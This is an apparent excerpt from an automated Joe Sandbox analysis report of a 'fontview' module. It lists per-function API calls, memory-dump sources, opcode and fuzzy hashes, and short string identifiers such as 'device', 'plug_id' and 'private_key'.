                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __amsg_exit__getptd_noexit__invoke_watson
                                                      • String ID:
                                                      • API String ID: 175857852-0
                                                      • Opcode ID: aea847968919292bc6357b8ebe2661733b33d75d60a3ac7339ff3a8988b4020b
                                                      • Instruction ID: 1d3f45d9d31e3010abf2b66f438840b9e2b7bc4b933bb305e85ec94c22506c0b
                                                      • Opcode Fuzzy Hash: aea847968919292bc6357b8ebe2661733b33d75d60a3ac7339ff3a8988b4020b
                                                      • Instruction Fuzzy Hash: 1971F5765006129EEB15DB24CC86B6B77ECEF82351F2480B9FD05DA086FB74EE848764
                                                      APIs
                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 1002446C
                                                      • EnterCriticalSection.KERNEL32(?,?,10023CE5,?,?,10023A1C,?,?,00000000,?,?,?,1002383D,?,?,?), ref: 10024482
                                                      • LeaveCriticalSection.KERNEL32(?,?,10023CE5,?,?,10023A1C,?,?,00000000,?,?,?,1002383D,?,?,?), ref: 10024491
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                      • String ID:
                                                      • API String ID: 3376869089-0
                                                      • Opcode ID: dcc36ad9bd771d17ef28f73011b240de4ec1de8bbacbd241ae23c05e860aa736
                                                      • Instruction ID: e1103fb16bcf34c27b6bba3f82fa35d23c377cf532448162990da8c687367291
                                                      • Opcode Fuzzy Hash: dcc36ad9bd771d17ef28f73011b240de4ec1de8bbacbd241ae23c05e860aa736
                                                      • Instruction Fuzzy Hash: 1531CF72A04B65EFD701CF84E885B99F7F8FB04725F91422AF90993680CB75AD50CBA0
                                                      APIs
                                                      • _malloc.LIBCMT ref: 10034371
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      • _free.LIBCMT ref: 10034384
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap_free_malloc
                                                      • String ID:
                                                      • API String ID: 1020059152-0
                                                      • Opcode ID: d07b2b7aa13eb9e1607cb20442737d13e92e30ae166e89c69003bc223c206e31
                                                      • Instruction ID: bb9a3691e4910ddf3f97fd95c6fed46118ceeaa6e102d9eb0dcd454a9ff698ef
                                                      • Opcode Fuzzy Hash: d07b2b7aa13eb9e1607cb20442737d13e92e30ae166e89c69003bc223c206e31
                                                      • Instruction Fuzzy Hash: 2011A739905626EFDB23EF749C4564A77D4FF002A3F128535F9489F151DF70A9408A90
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100174D2
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 100174E4
                                                        • Part of subcall function 10032521: __lock.LIBCMT ref: 10032532
                                                      • std::exception::exception.LIBCMT ref: 1001752B
                                                        • Part of subcall function 10035843: std::exception::_Copy_str.LIBCMT ref: 1003585C
                                                      • __CxxThrowException@8.LIBCMT ref: 10017540
                                                        • Part of subcall function 100374AB: RaiseException.KERNEL32(?,?,100324BA,?,?,?,?,?,100324BA,?,1005F454,100065DE), ref: 100374FC
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 10017549
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
                                                      • String ID:
                                                      • API String ID: 3430881366-0
                                                      • Opcode ID: d6a2380a438230f467dc9b6f5abf8cdf1449d0574d5a5743862a8377094055bd
                                                      • Instruction ID: 2e25aa19e792d692cfb8a749acde735e181f8864b27ee24d0f24afe00c039543
                                                      • Opcode Fuzzy Hash: d6a2380a438230f467dc9b6f5abf8cdf1449d0574d5a5743862a8377094055bd
                                                      • Instruction Fuzzy Hash: 4C115EB5801B84DEC721CFA9C48058FFBF4FF18240B90892FE49AD3A01D734A649CBA5
                                                      APIs
                                                      • __time64.LIBCMT ref: 1001C0CD
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 1001C0DF
                                                      • _rand.LIBCMT ref: 1001C0F0
                                                      • _rand.LIBCMT ref: 1001C100
                                                      • _rand.LIBCMT ref: 1001C10D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _rand$Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2467205089-0
                                                      • Opcode ID: 85291bb48af480fafd9442eab0fdbe79dcb2487f13a4d34283cf0040ea608ccf
                                                      • Instruction ID: 498d4cc3d495996ae9654b980ead4bc9d5abdff1964c0139d70e9de98c3e814c
                                                      • Opcode Fuzzy Hash: 85291bb48af480fafd9442eab0fdbe79dcb2487f13a4d34283cf0040ea608ccf
                                                      • Instruction Fuzzy Hash: 57F0B46F7C530428E112A1B66883F9B5386C7922B2F62442AFA005D0834CEBFC971171
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • __amsg_exit.LIBCMT ref: 100434B4
                                                      • __lock.LIBCMT ref: 100434C4
                                                      • InterlockedDecrement.KERNEL32(?), ref: 100434E1
                                                      • _free.LIBCMT ref: 100434F4
                                                      • InterlockedIncrement.KERNEL32(00B8A800), ref: 1004350C
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                                      • String ID:
                                                      • API String ID: 1231874560-0
                                                      • Opcode ID: 30783ecee63b859ae03d249e61e977a37b21bf0c85f4d24dd4a4fcbf5da3e8a6
                                                      • Instruction ID: 1a676bcf710e47d28fb425a3ba0c93491637c3a6279d9b895e8767c0b2df3840
                                                      • Opcode Fuzzy Hash: 30783ecee63b859ae03d249e61e977a37b21bf0c85f4d24dd4a4fcbf5da3e8a6
                                                      • Instruction Fuzzy Hash: 4B01C835901B21DBEB12DB618842B8DB3A0FF44772F25A125E805EB6D1CB747940CBD5
                                                      APIs
                                                      • __time64.LIBCMT ref: 10029187
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 100291A0
                                                      • _rand.LIBCMT ref: 100291B3
                                                      • _rand.LIBCMT ref: 100291C5
                                                      • _rand.LIBCMT ref: 100291D2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _rand$Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2467205089-0
                                                      • Opcode ID: c968f277d0f78b788435681ff016cffce340b1874899cb01f81134d615aae11b
                                                      • Instruction ID: 49897373e2c5e09ab42bbc18d07cd4d3912f03337949244e259c9962823e8d3a
                                                      • Opcode Fuzzy Hash: c968f277d0f78b788435681ff016cffce340b1874899cb01f81134d615aae11b
                                                      • Instruction Fuzzy Hash: E0F0507E7853024AD311D16268C6BD72387CBD2392FD10429BE055D043CC9F7C2B6176
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: data$msg$res
                                                      • API String ID: 3519838083-3980117613
                                                      • Opcode ID: 639c7fa742343cc957440622c82f50c4dc46beb9c5a8af481b02dc0626dc696f
                                                      • Instruction ID: ca96f964450022b4ce825e2093a35d337ed43a8c942eac252b94f1a881985688
                                                      • Opcode Fuzzy Hash: 639c7fa742343cc957440622c82f50c4dc46beb9c5a8af481b02dc0626dc696f
                                                      • Instruction Fuzzy Hash: 36519035800259DFDB01CFA4C891BEEB7B4EF15394F128169E81A7B191EB70BA88CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: device$plug_id$start
                                                      • API String ID: 3519838083-2830589257
                                                      • Opcode ID: e44a6e828e21c30134f211eeb5f4d4cf6651ae1a0eb397ebc608cd26752bb1b4
                                                      • Instruction ID: 61eb8341c66f9c1c37179d96dec97e96f165e86e955c115b352dda1f94a7ecc4
                                                      • Opcode Fuzzy Hash: e44a6e828e21c30134f211eeb5f4d4cf6651ae1a0eb397ebc608cd26752bb1b4
                                                      • Instruction Fuzzy Hash: DA415176900169DFEB01CF94C861AEE73B4FF15390F064129ED86A7159DB74BE44CB90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: private_key$res$uid
                                                      • API String ID: 3519838083-3738858810
                                                      • Opcode ID: cd588a721d36235ec090437caf60968450bd490db07ae58f426048e61703a1e6
                                                      • Instruction ID: 0cf17efe025f2ff022da59414d9263fdb3e23aa0c70f559fd6cd2d39d45429a1
                                                      • Opcode Fuzzy Hash: cd588a721d36235ec090437caf60968450bd490db07ae58f426048e61703a1e6
                                                      • Instruction Fuzzy Hash: C0419D76800568EFDB01CFD9C851AEEB3B4FF05390F018129E856AB145EB70BE88CB90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_sprintf
                                                      • String ID: device$version
                                                      • API String ID: 1907722333-3297806232
                                                      • Opcode ID: c444afb1065a848e864711c5baf8a15f5b3e0c74e49889477f4c9a2eee4a49fc
                                                      • Instruction ID: f25d236ea6f9278581fcfa21b551091c7206b5ca2dc78d628d144162d2d67334
                                                      • Opcode Fuzzy Hash: c444afb1065a848e864711c5baf8a15f5b3e0c74e49889477f4c9a2eee4a49fc
                                                      • Instruction Fuzzy Hash: 6341737680015DAFEB01CFE4C851AEE77B8FF05390F114129E945A7145D774AB88CB90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: string too long
                                                      • API String ID: 4104443479-2556327735
                                                      • Opcode ID: 16f67b8c74a5c08fb2015525530b7f88c27cc28432f184b8e1f740288661e490
                                                      • Instruction ID: fa3cd2dc3d769f6888f7928de3acb5536cb6e3c99d1e7fc2bdd3fd91821b90be
                                                      • Opcode Fuzzy Hash: 16f67b8c74a5c08fb2015525530b7f88c27cc28432f184b8e1f740288661e490
                                                      • Instruction Fuzzy Hash: 66317131700700DBEB36DE58D844957B7BEEB45680B10891DE8A28B28AD771E945CB91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_free
                                                      • String ID: device
                                                      • API String ID: 271808718-154121870
                                                      • Opcode ID: f3338ffb6a6534234161c5297e6b11117c421a73438d0535d4d26eb20f8d7493
                                                      • Instruction ID: 8b352d68cf92191ed834dfb9f3932a70d875671965cf77d54b86c3eaa2099a4a
                                                      • Opcode Fuzzy Hash: f3338ffb6a6534234161c5297e6b11117c421a73438d0535d4d26eb20f8d7493
                                                      • Instruction Fuzzy Hash: 5C3159B5900258EEEB05DFA4C845BEDFBB8FF55340F50406AE0466B296DBB42F84CB60
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10012472
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                        • Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17
                                                      • _free.LIBCMT ref: 10012546
                                                      • _free.LIBCMT ref: 10012558
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$_free
                                                      • String ID: sid
                                                      • API String ID: 2563830877-1461090996
                                                      • Opcode ID: 62433c5a039936ab5b2e7decc87c0f6e068c70fff7d72867ce5ecf1aa859c82e
                                                      • Instruction ID: 9d7c95b8395188239dba035838d6e92d8085a0d8a7789bfa883ebda44ad11a6c
                                                      • Opcode Fuzzy Hash: 62433c5a039936ab5b2e7decc87c0f6e068c70fff7d72867ce5ecf1aa859c82e
                                                      • Instruction Fuzzy Hash: A93148B5D0025CEEEB05DBA4C845BEDBBB8FF55340F10406AE04667292DBB46E84CB60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_free
                                                      • String ID: uuid
                                                      • API String ID: 271808718-3514781862
                                                      • Opcode ID: 1071d0dbcdb04b0911970d987590a937f9da5cd597a637b98f000c66b9ec7606
                                                      • Instruction ID: 60ed96529ef6cf83be549339f636282f4e59d17fc7a14b59ad06169e53b769f5
                                                      • Opcode Fuzzy Hash: 1071d0dbcdb04b0911970d987590a937f9da5cd597a637b98f000c66b9ec7606
                                                      • Instruction Fuzzy Hash: 4F319EB5C00158AFEB05DFA4C845BEEBBB4FF08350F50816EE485A7291DB706E89CB90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strtok$_sprintf
                                                      • String ID: %c%s
                                                      • API String ID: 3026970268-3720742152
                                                      • Opcode ID: 5700d7e9d398f7923e82cb589ae5201eedca8beab61949594473353bbd0a817d
                                                      • Instruction ID: 38263fc47139841850a4c0d857f1facff7ba69157adaf70a273bbf55d31e901d
                                                      • Opcode Fuzzy Hash: 5700d7e9d398f7923e82cb589ae5201eedca8beab61949594473353bbd0a817d
                                                      • Instruction Fuzzy Hash: BB11AB3A6041125BC72ACD2D9C509BEB7E8FB85266B20C11AFD88CF142DA35D98793B0
                                                      APIs
                                                      • StrChrA.SHLWAPI(0.0.0.0,0000003A,?,?,?,?,100224BC,?,?), ref: 1002537F
                                                      • _swscanf.LIBCMT ref: 100253B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
